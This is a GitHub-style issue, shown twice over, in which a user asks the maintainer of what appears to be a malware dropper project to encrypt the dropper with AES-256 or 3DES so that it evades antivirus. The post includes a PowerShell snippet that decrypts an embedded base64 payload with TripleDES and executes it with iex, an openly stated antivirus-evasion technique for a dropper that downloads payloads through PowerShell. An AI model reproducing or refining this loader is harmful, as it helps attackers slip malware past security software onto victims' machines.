Open 0xcreston opened 1 year ago
I would like you to make the dropper encrypted with aes-256 or 3des-192-cbc to evade AV's It would be something like this
$key = [Convert]::FromBase64String("xKc6APq4mM0xAjMg6TETedOZKqugeZYB") $iv = [Convert]::FromBase64String("pVglsY0BHNk=") $Payload = "YxNjPvngQ3g="; $TDES = New-Object "System.Security.Cryptography.TripleDESCryptoServiceProvider"; $TDES.Mode = [System.Security.Cryptography.CipherMode]::ECB; $TDES.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $TDES.BlockSize = 64; $TDES.KeySize = 192; $DataByte = [Convert]::FromBase64String($Payload) $MS = New-Object System.IO.MemoryStream(,$DataByte) $CS = New-Object System.Security.Cryptography.CryptoStream($MS,$TDES.CreateDecryptor($Key,$IV), [System.Security.Cryptography.CryptoStreamMode]::Read) $Reader = New-Object System.IO.StreamReader($CS) $Result = $Reader.ReadToEnd() $Reader.Dispose() iex($Result)
I don't know much about encryption , just making a suggestion that might reduce the AV detection rate of the dropper since powershell is used to download the payload.
I would like you to make the dropper encrypted with aes-256 or 3des-192-cbc to evade AV's It would be something like this
$key = [Convert]::FromBase64String("xKc6APq4mM0xAjMg6TETedOZKqugeZYB") $iv = [Convert]::FromBase64String("pVglsY0BHNk=") $Payload = "YxNjPvngQ3g="; $TDES = New-Object "System.Security.Cryptography.TripleDESCryptoServiceProvider"; $TDES.Mode = [System.Security.Cryptography.CipherMode]::ECB; $TDES.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $TDES.BlockSize = 64; $TDES.KeySize = 192; $DataByte = [Convert]::FromBase64String($Payload) $MS = New-Object System.IO.MemoryStream(,$DataByte) $CS = New-Object System.Security.Cryptography.CryptoStream($MS,$TDES.CreateDecryptor($Key,$IV), [System.Security.Cryptography.CryptoStreamMode]::Read) $Reader = New-Object System.IO.StreamReader($CS) $Result = $Reader.ReadToEnd() $Reader.Dispose() iex($Result)
I don't know much about encryption , just making a suggestion that might reduce the AV detection rate of the dropper since powershell is used to download the payload.